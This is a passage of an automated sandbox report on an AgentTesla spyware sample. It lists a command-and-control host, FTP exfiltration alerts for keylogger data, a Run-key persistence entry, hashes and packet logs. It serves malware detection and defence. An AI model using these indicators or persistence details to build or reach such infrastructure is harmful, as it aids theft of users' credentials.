                              https://api.ipify.org/tukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://crl.microsoftadobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://crl.microsadobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://s4.serv00.comukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.13.205
                                      api.ipify.orgUnited States
                                      13335CLOUDFLARENETUSfalse
                                      213.189.52.181
                                      s4.serv00.comPoland
                                      57367ECO-ATMAN-PLECO-ATMAN-PLtrue
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1588356
                                      Start date and time:2025-01-11 01:13:57 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 18s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:14
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:ukBQ4ch2nE.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 250
                                      • Number of non-executed functions: 22
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.28.90.27, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      TimeTypeDescription
                                      01:15:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                      01:15:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                                      19:15:22API Interceptor6674819x Sleep call for process: ukBQ4ch2nE.exe modified
                                      19:15:34API Interceptor5857560x Sleep call for process: adobe.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.13.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                      • api.ipify.org/
                                      lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                      • api.ipify.org/
                                      Simple1.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                      • api.ipify.org/
                                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                      • api.ipify.org/
                                      213.189.52.181Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                        HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                          Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                            Arrival Notice - BL 713410220035.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                              BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                DC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      s4.serv00.comStatement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      Arrival Notice - BL 713410220035.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      BL NBNSA240600050.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 213.189.52.181
                                                      DC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 213.189.52.181
                                                      PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      api.ipify.orgru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.26.12.205
                                                      s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      Y8Q1voljvb.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      DpTbBYeE7J.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 104.26.12.205
                                                      RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                      • 104.26.13.205
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSyqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                      • 104.21.112.1
                                                      JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.16.185.241
                                                      VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.16.1
                                                      http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 188.114.97.3
                                                      h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.96.1
                                                      http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      http://txto.eu.org/Get hashmaliciousUnknownBrowse
                                                      • 104.21.16.1
                                                      ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      tVuAoupHhZ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.32.1
                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.21.80.1
                                                      ECO-ATMAN-PLECO-ATMAN-PLStatement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      eu6OEBpBCI.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 91.227.41.9
                                                      HBL BLJ2T2411809005 & DAJKT2411000812.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      Amalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 185.36.171.17
                                                      Statement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 213.189.52.181
                                                      9zldYT23H2.elfGet hashmaliciousMirai, GafgytBrowse
                                                      • 31.186.82.2
                                                      RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                      • 128.204.223.111
                                                      http://bdvenlineabanven.serv00.net/Get hashmaliciousUnknownBrowse
                                                      • 85.194.246.69
                                                      http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                                      • 85.194.246.69
                                                      http://entrabdvline.serv00.net/Get hashmaliciousUnknownBrowse
                                                      • 85.194.246.69
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0eJGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.26.13.205
                                                      J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      J4CcLMNm55.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 104.26.13.205
                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 104.26.13.205
                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 104.26.13.205
                                                      4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                      • 104.26.13.205
                                                      No context
                                                      Process:C:\Users\user\Desktop\ukBQ4ch2nE.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):985600
                                                      Entropy (8bit):6.954286746934237
                                                      Encrypted:false
                                                      SSDEEP:12288:TxaMaSzOKy2r7SPNvZlu+RNen3gV8zhcfP7neAs:TYMaSSKy2/SPNLvRNeQV8lcfP7eX
                                                      MD5:74421477FAFAF6BEB9D8E3806E1F6643
                                                      SHA1:44857E574C1892EF8A3F8C8F41C5C0C0AAB20B83
                                                      SHA-256:EDB50E85473329F205F9CDE2FCA57605B2DCAFCA75C12C9DA52632BFC4249F26
                                                      SHA-512:D8C0C0A2945818D8E7ACAC55AF35A53E7352326A7EC28E04EDF5326E7CC5AA2E67983D800DA3E1B7A7A3A6BD3942E5306C7B0037E338A2EF00BE266A7B39C3C2
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                      Reputation:low
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0.................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........$.......J...|...=l..........................................".(.....*.s.........*.(C........*&.(......*".......*".(+....*VsE...(,...t.........*j.(;.....(<....sG...(=....*F.~....(J....^...*6.~.....(K...*F.~....(J....^...*6.~.....(K...*F.~....(J....^...*6.~.....(K...*F.~....(J........*J.~..........(L...*F.~....(J....^...*6.~.....(K...*F.~....(J........*J.~..........(L...*R.(M...-..(N......*.*F.~....(J...t....*6.~.....(L...*F.~....(J........*J.~..........(L...*b.(X..
                                                      Process:C:\Users\user\Desktop\ukBQ4ch2nE.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):6.954286746934237
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:ukBQ4ch2nE.exe
                                                      File size:985'600 bytes
                                                      MD5:74421477fafaf6beb9d8e3806e1f6643
                                                      SHA1:44857e574c1892ef8a3f8c8f41c5c0c0aab20b83
                                                      SHA256:edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26
                                                      SHA512:d8c0c0a2945818d8e7acac55af35a53e7352326a7ec28e04edf5326e7cc5aa2e67983d800da3e1b7a7a3a6bd3942e5306c7b0037e338a2ef00be266a7b39c3c2
                                                      SSDEEP:12288:TxaMaSzOKy2r7SPNvZlu+RNen3gV8zhcfP7neAs:TYMaSSKy2/SPNLvRNeQV8lcfP7eX
                                                      TLSH:5C256D483AA018F4C93685F6A8E7853C7A70AD5161E2D42525CF1F9CBDCCF414AE72AF
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0.................. ... ....@.. .......................`............@................................
                                                      Icon Hash:90cececece8e8eb0
                                                      Entrypoint:0x4f1e2e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x9E6E088B [Wed Mar 25 00:27:55 2054 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xf1de00x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x586.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xefe340xf0000cadbe61e04c8f8de70f802c58b0a0fc3False0.4536051432291667data6.960335286336614IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xf20000x5860x600d45152ed82fbaea65a2827053b941250False0.4127604166666667data4.013033306945572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xf40000xc0x20058586d625b6a4f6704526c5bcc5dad63False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0xf20a00x2fcdata0.43586387434554974
                                                      RT_MANIFEST0xf239c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2025-01-11T01:15:25.002925+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.1149712213.189.52.18121TCP
                                                      2025-01-11T01:15:25.560566+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149713213.189.52.18165516TCP
                                                      2025-01-11T01:15:25.566865+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149713213.189.52.18165516TCP
                                                      2025-01-11T01:15:36.646308+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.1149718213.189.52.18121TCP
                                                      2025-01-11T01:15:37.203280+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149721213.189.52.18164074TCP
                                                      2025-01-11T01:15:37.208459+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149721213.189.52.18164074TCP
                                                      2025-01-11T01:15:44.430083+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.1149726213.189.52.18121TCP
                                                      2025-01-11T01:15:44.991137+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149727213.189.52.18163872TCP
                                                      2025-01-11T01:15:44.996483+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1149727213.189.52.18163872TCP
                                                      2025-01-11T01:16:57.647871+01001800007Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs1192.168.2.1149929213.189.52.18163898TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 01:15:20.914655924 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:20.914767027 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:20.914856911 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:21.307173967 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:21.307225943 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:21.787609100 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:21.787754059 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:21.827548981 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:21.827606916 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:21.827924967 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:21.879077911 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:22.194001913 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:22.235338926 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:22.305874109 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:22.305932045 CET44349711104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:22.306010962 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:22.316674948 CET49711443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:23.137670994 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:23.142544985 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:23.142626047 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:23.733494997 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:23.733726978 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:23.738594055 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:23.928324938 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:23.928464890 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:23.933350086 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.221513033 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.221688986 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:24.226560116 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.415559053 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.415709972 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:24.420555115 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.609350920 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.609474897 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:24.614259005 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.803018093 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.803270102 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:24.808113098 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.996920109 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:24.997615099 CET4971365516192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.002785921 CET6551649713213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.002924919 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.002926111 CET4971365516192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.007883072 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.560271978 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.560565948 CET4971365516192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.560595036 CET4971365516192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.565355062 CET6551649713213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.566795111 CET6551649713213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.566864967 CET4971365516192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.613392115 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:25.753854990 CET2149712213.189.52.181192.168.2.11
                                                      Jan 11, 2025 01:15:25.800852060 CET4971221192.168.2.11213.189.52.181
                                                      Jan 11, 2025 01:15:33.252110958 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.252161026 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.252356052 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.255878925 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.255896091 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.720416069 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.720514059 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.722167969 CET49717443192.168.2.11104.26.13.205
                                                      Jan 11, 2025 01:15:33.722181082 CET44349717104.26.13.205192.168.2.11
                                                      Jan 11, 2025 01:15:33.722405910 CET44349717104.26.13.205192.168.2.11
